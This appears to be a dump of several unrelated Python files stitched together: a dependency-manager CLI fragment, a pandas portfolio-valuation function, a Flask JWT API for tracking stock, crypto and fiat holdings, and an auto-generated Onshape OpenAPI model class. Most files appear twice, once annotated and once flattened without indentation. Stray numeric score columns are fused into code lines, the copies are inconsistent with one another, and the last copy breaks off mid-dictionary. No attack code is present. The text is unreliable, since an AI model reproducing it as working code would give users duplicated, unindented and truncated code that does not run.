help="display the path of this dependency")
sub.add_argument('-c', '--config', action='store_true',
help="display the path of the config file")
sub.add_argument('-l', '--log', action='store_true',
help="display the path of the log file")
# Edit parser
info = "open the config file in the default editor"
sub = subs.add_parser('edit', description=info.capitalize() + '.',
help=info, parents=[debug, project], **shared)
# Parse arguments
namespace = parser.parse_args(args=args)
# Configure logging
common.configure_logging(namespace.verbose)
# Run the program
function, args, kwargs = _get_command(function, namespace)
if function:
_run_command(function, args, kwargs)
else:
parser.print_help()
sys.exit(1)
def _get_command(function, namespace): # pylint: disable=too-many-statements
args = []
kwargs = {}
if namespace.command == 'init':
function = commands.init
elif namespace.command in ['install', 'update']:
function = getattr(commands, namespace.command)
args = namespace.name
kwargs.update(root=namespace.root,
depth=namespace.depth,
force=namespace.force,
clean=namespace.clean)
if namespace.command == 'install':
kwargs.update(fetch=namespace.fetch)
if namespace.command == 'update':
kwargs.update(recurse=namespace.recurse,
lock=namespace.lock)
elif namespace.command == 'list':
function = commands.display
kwargs.update(root=namespace.root,
depth=namespace.depth,
allow_dirty=namespace.allow_dirty)
elif namespace.command == 'lock':
function = getattr(commands, namespace.command)
args = namespace.name
kwargs.update(root=namespace.root)
elif namespace.command == 'uninstall':
function = commands.delete
kwargs.update(root=namespace.root,
force=namespace.force,
keep_location=namespace.keep_location)
elif namespace.command == 'show':
function = commands.show
args = namespace.name
kwargs.update(root=namespace.root)
if namespace.config:
args.append('__config__')
if namespace.log:
args.append('__log__')
elif namespace.command == 'edit':
function = commands.edit
kwargs.update(root=namespace.root)
return function, args, kwargs
def _run_command(function, args, kwargs):
success = False
exit_message = None
try:
log.debug("Running %s command...", getattr(function, '__name__', 'a'))
success = function(*args, **kwargs)
except KeyboardInterrupt:
log.debug("Command canceled")
except exceptions.UncommittedChanges as exception:
_show_error(exception)
exit_message = "Run again with '--force' to discard changes"
except exceptions.ScriptFailure as exception:
_show_error(exception)
exit_message = "Run again with '--force' to ignore script errors"
finally:
if exit_message:
common.show(exit_message, color='message')
common.newline()
if success:
log.debug("Command succeeded")
else:
log.debug("Command failed")
sys.exit(1)
def _show_error(exception):
# TODO: require level=, evaluate all calls to dedent()
common.dedent(0)
common.newline()
common.show(str(exception), color='error')
common.newline()
if __name__ == '__main__': # pragma: no cover (manual test)
main() | 0.389314 | 0.073364 |
import pandas as pd
import numpy as np
def compute_portvals(market, orders, commission=0.00, impact=0.000, start_val=100000):
    """
    Compute the daily total portfolio value (holdings + cash) for a set of orders.

    market : Market_DataFrame returned by actions.get_stock_data
        Single symbol: flat columns including 'close' (and optionally
        'volume').  Multiple symbols: assumed to have MultiIndex columns
        of (<TICKER>, <field>) — inferred from the market.columns.levels
        usage below; confirm with the data source.
    orders : Dataframe of format
    {
        'date': trading day,
        <TICKER>: <ORDER>
    }
    orders should be indexed by the 'date' column.
    where ticker is the stock ticker, and order is the amount to buy (+ number), sell (- number), short (if net orders is negative), and hold (if order is 0)
    holding does not need to be specified however.
    commission : flat fee charged per executed trade
    impact : fractional market impact; buys pay (1+impact), sells receive (1-impact)
    start_val : starting cash balance

    Returns a Series: total portfolio value per trading day.
    """
    market = pd.DataFrame(market)
    orders.sort_index(inplace=True)  # NOTE: mutates the caller's orders frame
    # Drop orders on days the market data does not cover.
    orders = orders.loc[orders.index.isin(market.index)]
    symbols = orders.columns
    # Per-day deltas: one column per symbol plus a CASH column.
    trades = pd.DataFrame(index=market.index,
                          data=np.zeros((len(market), len(symbols) + 1)),
                          columns=symbols.tolist() + ['CASH'])
    order_on_days = market.loc[orders.index.unique()]
    # CASH "price" of 1 so holdings * market values cash at face value.
    market.loc[:,'CASH'] = np.ones(len(market))
    # this function can be vectorized, LOOKING into it
    for index, row in order_on_days.iterrows():
        # each row is a trading day
        execute = orders[orders.index == index]
        for _, diff in execute.iterrows():
            traded_symbols = diff[~np.isnan(diff)].index # get all stocks which traded on this day
            for stock in traded_symbols:
                trades.loc[index, stock] += diff[stock]
                # Buys cost more, sells receive less, by the impact fraction.
                impact_on_trade = (1 + impact) if diff[stock] > 0 else (1 - impact)
                current_cash = trades.loc[index, 'CASH']
                if len(symbols) == 1:
                    trades.loc[index, 'CASH'] = current_cash + (row['close'] * -diff[stock] * impact_on_trade) - (commission)
                else:
                    trades.loc[index, 'CASH'] = current_cash + (row[(stock, 'close')] * -diff[stock] * impact_on_trade) - (commission)
    # Cumulative trades give holdings; seed the cash column with start_val.
    holdings = trades.cumsum()
    holdings.loc[:, 'CASH'] += start_val
    if len(symbols) == 1:
        # Reduce the market frame to a single price column named after the symbol.
        market = market.drop(columns=['volume']) if 'volume' in market.columns else market
        market = market.rename(columns={'close': symbols[0]})
        value = holdings * market
    else:
        # Pull each ticker's 'close' series out of the MultiIndex columns.
        closing = market[ [(x, 'close') for x in market.columns.levels[0] ] ].stack()
        closing.index = closing.index.droplevel(1)
        value = holdings * closing[ [x for x in holdings.columns[:-1]] ]
return value.sum(axis=1) | quantea/marketsim/portvals.py | import pandas as pd
import numpy as np
def compute_portvals(market, orders, commission=0.00, impact=0.000, start_val=100000):
"""
market : Market_DataFrame returned by actions.get_stock_data
orders : Dataframe of format
{
'date': trading day,
<TICKER>: <ORDER>
}
orders should be indexed by the 'date' column.
where ticker is the stock ticker, and order is the amount to buy (+ number), sell (- number), short (if net orders is negative), and hold (if order is 0)
holding does not need to be specified however.
"""
market = pd.DataFrame(market)
orders.sort_index(inplace=True)
orders = orders.loc[orders.index.isin(market.index)]
symbols = orders.columns
trades = pd.DataFrame(index=market.index,
data=np.zeros((len(market), len(symbols) + 1)),
columns=symbols.tolist() + ['CASH'])
order_on_days = market.loc[orders.index.unique()]
market.loc[:,'CASH'] = np.ones(len(market))
# this function can be vectorized, LOOKING into it
for index, row in order_on_days.iterrows():
# each row is a trading day
execute = orders[orders.index == index]
for _, diff in execute.iterrows():
traded_symbols = diff[~np.isnan(diff)].index # get all stocks which traded on this day
for stock in traded_symbols:
trades.loc[index, stock] += diff[stock]
impact_on_trade = (1 + impact) if diff[stock] > 0 else (1 - impact)
current_cash = trades.loc[index, 'CASH']
if len(symbols) == 1:
trades.loc[index, 'CASH'] = current_cash + (row['close'] * -diff[stock] * impact_on_trade) - (commission)
else:
trades.loc[index, 'CASH'] = current_cash + (row[(stock, 'close')] * -diff[stock] * impact_on_trade) - (commission)
holdings = trades.cumsum()
holdings.loc[:, 'CASH'] += start_val
if len(symbols) == 1:
market = market.drop(columns=['volume']) if 'volume' in market.columns else market
market = market.rename(columns={'close': symbols[0]})
value = holdings * market
else:
closing = market[ [(x, 'close') for x in market.columns.levels[0] ] ].stack()
closing.index = closing.index.droplevel(1)
value = holdings * closing[ [x for x in holdings.columns[:-1]] ]
return value.sum(axis=1) | 0.305386 | 0.383064 |
from flask import request, render_template, jsonify
from flask_jwt_extended import jwt_required, create_access_token, get_jwt_identity, get_raw_jwt
from app import app, db, jwt
from app.models import User, Asset
from sqlalchemy.exc import IntegrityError
from assets import stocks, cryptocurrency, fiat, stocks_options, cryptocurrency_options, fiat_options
from utils.sort import process_overview, process_detail
import time
blacklist = set()  # revoked JWT ids (jti); in-memory only, so lost on restart
@jwt.token_in_blacklist_loader
def check_if_token_in_blacklist(decrypted_token):
    """Return True when this token's jti was revoked via /api/logout."""
    jti = decrypted_token['jti']
    return jti in blacklist
@app.route('/')
def home():
    """Smoke-test route; confirms the app is serving requests."""
    return "Hello world"
@app.route('/api/register', methods=['POST'])
def register():
    """Create a user account and return a JWT for it.

    Expects JSON: {"username": ..., "name": ..., "password": ...}.
    Responds 400 on a missing body, 409 when the username is taken.
    """
    data = request.get_json()
    if data is None:
        return jsonify(message="No object received!"), 400
    user = User(
        name=data['name'],
        username=data['username']
    )
    user.set_password(data['password'])
    db.session.add(user)
    try:
        db.session.commit()
    except IntegrityError:
        # Roll back so the session stays usable after the failed commit.
        db.session.rollback()
        return jsonify(
            message="Username already taken"
        ), 409
    # The commit populates user.user_id; the original's extra
    # `User.query.filter_by(...)` round-trip was dead code.
    access_token = create_access_token(identity=data['username'])
    return jsonify(
        message="Registration successful!",
        id=user.user_id,
        token=access_token
    )
@app.route('/api/delete_user', methods=['POST'])
@jwt_required
def delete_user():
    """Admin-only: delete the user named in the JSON body.

    Expects JSON: {"username": ...}. Responds 403 for non-admins and
    404 when the target user does not exist.
    """
    current_user = get_jwt_identity()
    user = User.query.filter_by(username=current_user).first()
    if not user.admin:
        return jsonify(
            message="No access right!"
        ), 403
    data = request.get_json()
    target = User.query.filter_by(username=data['username']).first()
    if target is None:
        # The original called db.session.delete(None) and crashed here.
        return jsonify(
            message="User not found!"
        ), 404
    db.session.delete(target)
    db.session.commit()
    return jsonify(
        message="User deleted successfully!"
    ), 200
@app.route('/api/login', methods=['POST'])
def login():
    """Verify credentials and return a JWT on success.

    Expects JSON: {"username": ..., "password": ...}.
    """
    data = request.get_json()
    if data is None:  # was `data == None`; also fixes "recieved" typo below
        return jsonify(
            message="No object received!"
        ), 400
    user = User.query.filter_by(username=data['username']).first()
    # Same response for unknown user and wrong password (no user enumeration).
    if user is None or not user.check_password(data['password']):
        return jsonify(message="Username or password incorrect"), 404
    access_token = create_access_token(identity=data['username'])
    return jsonify(
        message="Login successful!",
        id=user.user_id,
        token=access_token
    )
@app.route('/api/logout', methods=['POST'])
@jwt_required
def logout():
    """Revoke the caller's token by blacklisting its jti."""
    blacklist.add(get_raw_jwt()['jti'])
    return jsonify(message="Logout successful!"), 200
@app.route('/api/is_authorized', methods=['GET'])
@jwt_required
def is_authorized():
    """Probe endpoint: succeeds only with a valid, non-revoked token."""
    return jsonify(message="Authorized!"), 200
@app.route('/api/assets', methods=['GET'])
@jwt_required
def assets():
    """Return the selectable assets grouped by asset class.

    Response shape: {"assets": {<class name>: [<ticker>, ...], ...}}.
    """
    asset_classes = {
        'Stocks': stocks_options,
        'Cryptocurrency': cryptocurrency_options,
        'Fiat currency': fiat_options,
    }
    return {'assets': asset_classes}
@app.route('/api/add_asset', methods=['POST'])
@jwt_required
def add_asset():
    """Add a holding for the authenticated user.

    Expects JSON: {"asset_class": ..., "asset": ..., "quantity": "10.5"}.
    Quantity accepts a decimal comma. Responds 404 for an unknown asset
    class or ticker.
    """
    current_user = get_jwt_identity()
    owner = User.query.filter_by(username=current_user).first()
    data = request.get_json()
    # Dispatch table replaces an if/elif chain that shadowed builtin `list`.
    known_assets = {
        'Stocks': stocks,
        'Cryptocurrency': cryptocurrency,
        'Fiat currency': fiat,
    }.get(data['asset_class'])
    if known_assets is None:
        return jsonify(
            message="Asset Class not found!"
        ), 404
    if data['asset'] not in known_assets:
        return jsonify(
            message="Asset not found!"
        ), 404
    # Asset is added regardless of whether it already exists in the database.
    quantity = float(data['quantity'].replace(',', '.'))  # decimal comma OK
    new_asset = Asset(asset_class=data['asset_class'], asset=data['asset'],
                      quantity=quantity, allocator=owner)
    new_asset.set_price()
    db.session.add(new_asset)
    db.session.commit()
    return jsonify(
        message="Asset added successfully!"
    ), 201
@app.route('/api/overview', methods=['GET'])
@jwt_required
def overview():
    """Return the caller's aggregated holdings and portfolio stats.

    Response shape (built by process_overview):
        holdings: {<class>: {<ticker>: [<qty>, <value USD>], ...}, ...}
        stats: {net_worth: <USD>,
                fractions: {<class>: [<fraction>, <value USD>], ...}}
    """
    user = User.query.filter_by(username=get_jwt_identity()).first()
    return jsonify(data=process_overview(user)), 200
@app.route('/api/detail/<asset>', methods=['GET'])
@jwt_required
def detail(asset):
    """Return per-lot detail for one of the caller's assets (e.g. ``AMD``).

    Response shape (built by process_detail):
        {asset_class, asset, total_quantity, total_value,
         holdings: [{id, date, price, current_price, quantity,
                     gain_percent, gain}, ...]}
    """
    user = User.query.filter_by(username=get_jwt_identity()).first()
    return process_detail(user, asset)
@app.route('/api/edit', methods=['POST'])
@jwt_required
def edit():
    """Update price and quantity of one of the caller's asset lots.

    Expects JSON: {"id": ..., "price": ..., "quantity": ...}.
    Responds 404 when the asset does not exist or belongs to another user.
    """
    data = request.get_json()
    current_user = get_jwt_identity()
    user = User.query.filter_by(username=current_user).first()
    asset = Asset.query.filter_by(id=data['id']).first()
    # None check must come first: the original evaluated asset.user_id before
    # `asset == None` and raised AttributeError for unknown ids.
    if asset is None or asset.user_id != user.user_id:
        return jsonify(
            message="Asset not found!"
        ), 404
    asset.price = data['price']
    asset.quantity = data['quantity']
    db.session.commit()  # one commit covers both field updates
    return jsonify(
        message="Update successfull!"  # sic: kept byte-identical for clients
    ), 200
@app.route('/api/delete_asset/<id>', methods=['GET'])
@jwt_required
def delete(id):
    """Delete one of the caller's asset lots by id.

    Responds 404 when the asset does not exist or belongs to another user.
    NOTE(review): this mutates state on GET; DELETE/POST would be safer.
    """
    current_user = get_jwt_identity()
    user = User.query.filter_by(username=current_user).first()
    asset = Asset.query.filter_by(id=id).first()
    # None check must come first (original raised AttributeError for bad ids).
    if asset is None or asset.user_id != user.user_id:
        return jsonify(
            message="Asset not found!"
        ), 404
    db.session.delete(asset)
    db.session.commit()
    return jsonify(
        message="Asset deleted successfully!"
    ), 200
from flask_jwt_extended import jwt_required, create_access_token, get_jwt_identity, get_raw_jwt
from app import app, db, jwt
from app.models import User, Asset
from sqlalchemy.exc import IntegrityError
from assets import stocks, cryptocurrency, fiat, stocks_options, cryptocurrency_options, fiat_options
from utils.sort import process_overview, process_detail
import time
blacklist = set()
@jwt.token_in_blacklist_loader
def check_if_token_in_blacklist(decrypted_token):
jti = decrypted_token['jti']
return jti in blacklist
@app.route('/')
def home():
return "Hello world"
@app.route('/api/register', methods=['POST'])
def register():
# data: {
# username: '',
# name: '',
# password: ''
# }
data = request.get_json()
user = User(
name = data['name'],
username = data['username']
)
user.set_password(data['password'])
db.session.add(user)
try:
db.session.commit()
except IntegrityError:
return jsonify(
message="Username already taken"
), 409
new_user = User.query.filter_by(username=data['username']).first()
access_token = create_access_token(identity=data['username'])
return jsonify(
message = "Registration successful!",
id = user.user_id,
token = access_token
)
@app.route('/api/delete_user', methods=['POST'])
@jwt_required
def delete_user():
# data: {
# username: '',
# }
current_user = get_jwt_identity()
user = User.query.filter_by(username=current_user).first()
if not user.admin:
return jsonify(
message="No access right!"
), 403
data = request.get_json()
user = User.query.filter_by(username=data['username']).first()
db.session.delete(user)
db.session.commit()
return jsonify(
message="User deleted successfully!"
), 200
@app.route('/api/login', methods=['POST'])
def login():
# data: {
# username: '',
# password: ''
# }
data = request.get_json()
if data == None:
return jsonify(
message="No object recieved!"
), 400
user = User.query.filter_by(username=data['username']).first()
if user == None or not user.check_password(data['password']):
return jsonify(message="Username or password incorrect"), 404
else:
access_token = create_access_token(identity=data['username'])
return jsonify(
message = "Login successful!",
id = user.user_id,
token = access_token
)
@app.route('/api/logout', methods=['POST'])
@jwt_required
def logout():
jti = get_raw_jwt()['jti']
blacklist.add(jti)
return jsonify(
message="Logout successful!"
), 200
@app.route('/api/is_authorized', methods=['GET'])
@jwt_required
def is_authorized():
return jsonify(
message="Authorized!"
), 200
@app.route('/api/assets', methods=['GET'])
@jwt_required
def assets():
# assets: {
# stocks: [AAPL, AMD ...],
# cryptocurrency: [BTC, ETH ...],
# fiat: [CHF, USD, EUR ...],
# comodities: [Oil, ],
# metals: [GOLD, Silver, Copper ...]
# }
return {
'assets': {
'Stocks': stocks_options,
'Cryptocurrency': cryptocurrency_options,
'Fiat currency': fiat_options
}
}
@app.route('/api/add_asset', methods=['POST'])
@jwt_required
def add_asset():
    """Add a holding for the authenticated user.

    Expects JSON: {"asset_class": ..., "asset": ..., "quantity": "10.5"}.
    Quantity accepts a decimal comma. Responds 404 for an unknown asset
    class or ticker.
    """
    current_user = get_jwt_identity()
    owner = User.query.filter_by(username=current_user).first()
    data = request.get_json()
    # Dispatch table replaces an if/elif chain that shadowed builtin `list`.
    known_assets = {
        'Stocks': stocks,
        'Cryptocurrency': cryptocurrency,
        'Fiat currency': fiat,
    }.get(data['asset_class'])
    if known_assets is None:
        return jsonify(
            message="Asset Class not found!"
        ), 404
    if data['asset'] not in known_assets:
        return jsonify(
            message="Asset not found!"
        ), 404
    # Asset is added regardless of whether it already exists in the database.
    quantity = float(data['quantity'].replace(',', '.'))  # decimal comma OK
    new_asset = Asset(asset_class=data['asset_class'], asset=data['asset'],
                      quantity=quantity, allocator=owner)
    new_asset.set_price()
    db.session.add(new_asset)
    db.session.commit()
    return jsonify(
        message="Asset added successfully!"
    ), 201
@app.route('/api/overview', methods=['GET'])
@jwt_required
def overview():
# holdings: {
# stocks: [
# AMD: [<qty>, <value in USD>],
# AAPL: [<qty>, <value in USD>]
# ],
# crypto: [
# BTC: [<qty>, <value in USD>]
# ]
# fiat: [
# CHF: [<qty>, <value in USD>]
# ]
# },
# stats: {
# net_worth: {
# <value in USD>
# },
# fractions: {
# stocks: [<fraction>, <value in USD>],
# crypto: [<fraction>, <value in USD>],
# fiat: [<fraction>, <value in USD>]
# }
# }
# }
current_user = get_jwt_identity()
user = User.query.filter_by(username=current_user).first()
data = process_overview(user)
return jsonify(
data=data
), 200
@app.route('/api/detail/<asset>', methods=['GET'])
@jwt_required
def detail(asset): #i.e. asset = AMD
# data: {
# asset_class: '',
# asset: '',
# total_quantity: '',
# total_value: '',
# holdings: [{
# id: <asset ID>
# date: <data bought>,
# price: <price bought at>,
# current_price: <price now>,
# quantity: '',
# gain_percent: <gain in percent>,
# gain: <gain in USD>
# }]
# }
# }
current_user = get_jwt_identity()
user = User.query.filter_by(username=current_user).first()
data = process_detail(user, asset)
return data
@app.route('/api/edit', methods=['POST'])
@jwt_required
def edit():
    """Update price and quantity of one of the caller's asset lots.

    Expects JSON: {"id": ..., "price": ..., "quantity": ...}.
    Responds 404 when the asset does not exist or belongs to another user.
    """
    data = request.get_json()
    current_user = get_jwt_identity()
    user = User.query.filter_by(username=current_user).first()
    asset = Asset.query.filter_by(id=data['id']).first()
    # None check must come first: the original evaluated asset.user_id before
    # `asset == None` and raised AttributeError for unknown ids.
    if asset is None or asset.user_id != user.user_id:
        return jsonify(
            message="Asset not found!"
        ), 404
    asset.price = data['price']
    asset.quantity = data['quantity']
    db.session.commit()  # one commit covers both field updates
    return jsonify(
        message="Update successfull!"  # sic: kept byte-identical for clients
    ), 200
@app.route('/api/delete_asset/<id>', methods=['GET'])
@jwt_required
def delete(id):
    """Delete one of the caller's asset lots by id.

    Responds 404 when the asset does not exist or belongs to another user.
    NOTE(review): this mutates state on GET; DELETE/POST would be safer.
    (Also strips dataset residue "| 0.404743 | 0.074131" fused to the
    final line of the original.)
    """
    current_user = get_jwt_identity()
    user = User.query.filter_by(username=current_user).first()
    asset = Asset.query.filter_by(id=id).first()
    # None check must come first (original raised AttributeError for bad ids).
    if asset is None or asset.user_id != user.user_id:
        return jsonify(
            message="Asset not found!"
        ), 404
    db.session.delete(asset)
    db.session.commit()
    return jsonify(
        message="Asset deleted successfully!"
    ), 200
from __future__ import absolute_import
import re # noqa: F401
import sys # noqa: F401
import six # noqa: F401
import nulltype # noqa: F401
from onshape_client.oas.model_utils import ( # noqa: F401
ModelComposed,
ModelNormal,
ModelSimple,
date,
datetime,
file_type,
int,
none_type,
str,
validate_get_composed_info,
)
try:
from onshape_client.oas.models import bt_revision_approver_info
except ImportError:
bt_revision_approver_info = sys.modules[
"onshape_client.oas.models.bt_revision_approver_info"
]
try:
from onshape_client.oas.models import bt_user_summary_info
except ImportError:
bt_user_summary_info = sys.modules["onshape_client.oas.models.bt_user_summary_info"]
class BTRevisionInfo(ModelNormal):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
Attributes:
allowed_values (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
with a capitalized key describing the allowed value and an allowed
value. These dicts store the allowed enum values.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
discriminator_value_class_map (dict): A dict to go from the discriminator
variable value to the discriminator class name.
validations (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
that stores validations for max_length, min_length, max_items,
min_items, exclusive_maximum, inclusive_maximum, exclusive_minimum,
inclusive_minimum, and regex.
additional_properties_type (tuple): A tuple of classes accepted
as additional properties values.
"""
allowed_values = {}
validations = {}
additional_properties_type = None
@staticmethod
def openapi_types():
"""
This must be a class method so a model may have properties that are
of type self, this ensures that we don't create a cyclic import
Returns
openapi_types (dict): The key is attribute name
and the value is attribute type.
"""
return {
"approvers": (
[bt_revision_approver_info.BTRevisionApproverInfo],
), # noqa: E501
"auto_obsoletion_release_id": (str,), # noqa: E501
"auto_obsoletion_release_name": (str,), # noqa: E501
"can_current_user_obsolete": (bool,), # noqa: E501
"can_export": (bool,), # noqa: E501
"company_id": (str,), # noqa: E501
"configuration": (str,), # noqa: E501
"document_id": (str,), # noqa: E501
"document_name": (str,), # noqa: E501
"element_id": (str,), # noqa: E501
"element_type": (int,), # noqa: E501
"error_message": (str,), # noqa: E501
"file_name": (str,), # noqa: E501
"flat_part_insertable_id": (str,), # noqa: E501
"href": (str,), # noqa: E501
"id": (str,), # noqa: E501
"insertable_id": (str,), # noqa: E501
"is_obsolete": (bool,), # noqa: E501
"is_translatable": (bool,), # noqa: E501
"mime_type": (str,), # noqa: E501
"name": (str,), # noqa: E501
"next_revision_id": (str,), # noqa: E501
"obsoletion_package_id": (str,), # noqa: E501
"part_id": (str,), # noqa: E501
"part_number": (str,), # noqa: E501
"previous_revision_id": (str,), # noqa: E501
"release_created_date": (datetime,), # noqa: E501
"release_id": (str,), # noqa: E501
"release_name": (str,), # noqa: E501
"released_by": (bt_user_summary_info.BTUserSummaryInfo,), # noqa: E501
"revision": (str,), # noqa: E501
"revision_rule_id": (str,), # noqa: E501
"version_id": (str,), # noqa: E501
"version_name": (str,), # noqa: E501
"view_ref": (str,), # noqa: E501
}
@staticmethod
def discriminator():
return None
attribute_map = {
"approvers": "approvers", # noqa: E501
"auto_obsoletion_release_id": "autoObsoletionReleaseId", # noqa: E501
"auto_obsoletion_release_name": "autoObsoletionReleaseName", # noqa: E501
"can_current_user_obsolete": "canCurrentUserObsolete", # noqa: E501
"can_export": "canExport", # noqa: E501
"company_id": "companyId", # noqa: E501
"configuration": "configuration", # noqa: E501
"document_id": "documentId", # noqa: E501
"document_name": "documentName", # noqa: E501
"element_id": "elementId", # noqa: E501
"element_type": "elementType", # noqa: E501
"error_message": "errorMessage", # noqa: E501
"file_name": "fileName", # noqa: E501
"flat_part_insertable_id": "flatPartInsertableId", # noqa: E501
"href": "href", # noqa: E501
"id": "id", # noqa: E501
"insertable_id": "insertableId", # noqa: E501
"is_obsolete": "isObsolete", # noqa: E501
"is_translatable": "isTranslatable", # noqa: E501
"mime_type": "mimeType", # noqa: E501
"name": "name", # noqa: E501
"next_revision_id": "nextRevisionId", # noqa: E501
"obsoletion_package_id": "obsoletionPackageId", # noqa: E501
"part_id": "partId", # noqa: E501
"part_number": "partNumber", # noqa: E501
"previous_revision_id": "previousRevisionId", # noqa: E501
"release_created_date": "releaseCreatedDate", # noqa: E501
"release_id": "releaseId", # noqa: E501
"release_name": "releaseName", # noqa: E501
"released_by": "releasedBy", # noqa: E501
"revision": "revision", # noqa: E501
"revision_rule_id": "revisionRuleId", # noqa: E501
"version_id": "versionId", # noqa: E501
"version_name": "versionName", # noqa: E501
"view_ref": "viewRef", # noqa: E501
}
@staticmethod
def _composed_schemas():
return None
required_properties = set(
[
"_data_store",
"_check_type",
"_from_server",
"_path_to_item",
"_configuration",
]
)
def __init__(
self,
_check_type=True,
_from_server=False,
_path_to_item=(),
_configuration=None,
**kwargs
): # noqa: E501
"""bt_revision_info.BTRevisionInfo - a model defined in OpenAPI
Keyword Args:
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_from_server (bool): True if the data is from the server
False if the data is from the client (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
approvers ([bt_revision_approver_info.BTRevisionApproverInfo]): [optional] # noqa: E501
auto_obsoletion_release_id (str): [optional] # noqa: E501
auto_obsoletion_release_name (str): [optional] # noqa: E501
can_current_user_obsolete (bool): [optional] # noqa: E501
can_export (bool): [optional] # noqa: E501
company_id (str): [optional] # noqa: E501
configuration (str): [optional] # noqa: E501
document_id (str): [optional] # noqa: E501
document_name (str): [optional] # noqa: E501
element_id (str): [optional] # noqa: E501
element_type (int): [optional] # noqa: E501
error_message (str): [optional] # noqa: E501
file_name (str): [optional] # noqa: E501
flat_part_insertable_id (str): [optional] # noqa: E501
href (str): [optional] # noqa: E501
id (str): [optional] # noqa: E501
insertable_id (str): [optional] # noqa: E501
is_obsolete (bool): [optional] # noqa: E501
is_translatable (bool): [optional] # noqa: E501
mime_type (str): [optional] # noqa: E501
name (str): [optional] # noqa: E501
next_revision_id (str): [optional] # noqa: E501
obsoletion_package_id (str): [optional] # noqa: E501
part_id (str): [optional] # noqa: E501
part_number (str): [optional] # noqa: E501
previous_revision_id (str): [optional] # noqa: E501
release_created_date (datetime): [optional] # noqa: E501
release_id (str): [optional] # noqa: E501
release_name (str): [optional] # noqa: E501
released_by (bt_user_summary_info.BTUserSummaryInfo): [optional] # noqa: E501
revision (str): [optional] # noqa: E501
revision_rule_id (str): [optional] # noqa: E501
version_id (str): [optional] # noqa: E501
version_name (str): [optional] # noqa: E501
view_ref (str): [optional] # noqa: E501
"""
self._data_store = {}
self._check_type = _check_type
self._from_server = _from_server
self._path_to_item = _path_to_item
self._configuration = _configuration
for var_name, var_value in six.iteritems(kwargs):
if (
var_name not in self.attribute_map
and self._configuration is not None
and self._configuration.discard_unknown_keys
and self.additional_properties_type is None
):
# discard variable.
continue
setattr(self, var_name, var_value) | python/onshape_client/oas/models/bt_revision_info.py | from __future__ import absolute_import
import re # noqa: F401
import sys # noqa: F401
import six # noqa: F401
import nulltype # noqa: F401
from onshape_client.oas.model_utils import ( # noqa: F401
ModelComposed,
ModelNormal,
ModelSimple,
date,
datetime,
file_type,
int,
none_type,
str,
validate_get_composed_info,
)
try:
from onshape_client.oas.models import bt_revision_approver_info
except ImportError:
bt_revision_approver_info = sys.modules[
"onshape_client.oas.models.bt_revision_approver_info"
]
try:
from onshape_client.oas.models import bt_user_summary_info
except ImportError:
bt_user_summary_info = sys.modules["onshape_client.oas.models.bt_user_summary_info"]
class BTRevisionInfo(ModelNormal):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
Attributes:
allowed_values (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
with a capitalized key describing the allowed value and an allowed
value. These dicts store the allowed enum values.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
discriminator_value_class_map (dict): A dict to go from the discriminator
variable value to the discriminator class name.
validations (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
that stores validations for max_length, min_length, max_items,
min_items, exclusive_maximum, inclusive_maximum, exclusive_minimum,
inclusive_minimum, and regex.
additional_properties_type (tuple): A tuple of classes accepted
as additional properties values.
"""
allowed_values = {}
validations = {}
additional_properties_type = None
@staticmethod
def openapi_types():
"""
This must be a class method so a model may have properties that are
of type self, this ensures that we don't create a cyclic import
Returns
openapi_types (dict): The key is attribute name
and the value is attribute type.
"""
return {
"approvers": (
[bt_revision_approver_info.BTRevisionApproverInfo],
), # noqa: E501
"auto_obsoletion_release_id": (str,), # noqa: E501
"auto_obsoletion_release_name": (str,), # noqa: E501
"can_current_user_obsolete": (bool,), # noqa: E501
"can_export": (bool,), # noqa: E501
"company_id": (str,), # noqa: E501
"configuration": (str,), # noqa: E501
"document_id": (str,), # noqa: E501
"document_name": (str,), # noqa: E501
"element_id": (str,), # noqa: E501
"element_type": (int,), # noqa: E501
"error_message": (str,), # noqa: E501
"file_name": (str,), # noqa: E501
"flat_part_insertable_id": (str,), # noqa: E501
"href": (str,), # noqa: E501
"id": (str,), # noqa: E501
"insertable_id": (str,), # noqa: E501
"is_obsolete": (bool,), # noqa: E501
"is_translatable": (bool,), # noqa: E501
"mime_type": (str,), # noqa: E501
"name": (str,), # noqa: E501
"next_revision_id": (str,), # noqa: E501
"obsoletion_package_id": (str,), # noqa: E501
"part_id": (str,), # noqa: E501
"part_number": (str,), # noqa: E501
"previous_revision_id": (str,), # noqa: E501
"release_created_date": (datetime,), # noqa: E501
"release_id": (str,), # noqa: E501
"release_name": (str,), # noqa: E501
"released_by": (bt_user_summary_info.BTUserSummaryInfo,), # noqa: E501
"revision": (str,), # noqa: E501
"revision_rule_id": (str,), # noqa: E501
"version_id": (str,), # noqa: E501
"version_name": (str,), # noqa: E501
"view_ref": (str,), # noqa: E501
}
@staticmethod
def discriminator():
return None
attribute_map = {
"approvers": "approvers", # noqa: E501
"auto_obsoletion_release_id": "autoObsoletionReleaseId", # noqa: E501
"auto_obsoletion_release_name": "autoObsoletionReleaseName", # noqa: E501
"can_current_user_obsolete": "canCurrentUserObsolete", # noqa: E501
"can_export": "canExport", # noqa: E501
"company_id": "companyId", # noqa: E501
"configuration": "configuration", # noqa: E501
"document_id": "documentId", # noqa: E501
"document_name": "documentName", # noqa: E501
"element_id": "elementId", # noqa: E501
"element_type": "elementType", # noqa: E501
"error_message": "errorMessage", # noqa: E501
"file_name": "fileName", # noqa: E501
"flat_part_insertable_id": "flatPartInsertableId", # noqa: E501
"href": "href", # noqa: E501
"id": "id", # noqa: E501
"insertable_id": "insertableId", # noqa: E501
"is_obsolete": "isObsolete", # noqa: E501
"is_translatable": "isTranslatable", # noqa: E501
"mime_type": "mimeType", # noqa: E501
"name": "name", # noqa: E501
"next_revision_id": "nextRevisionId", # noqa: E501
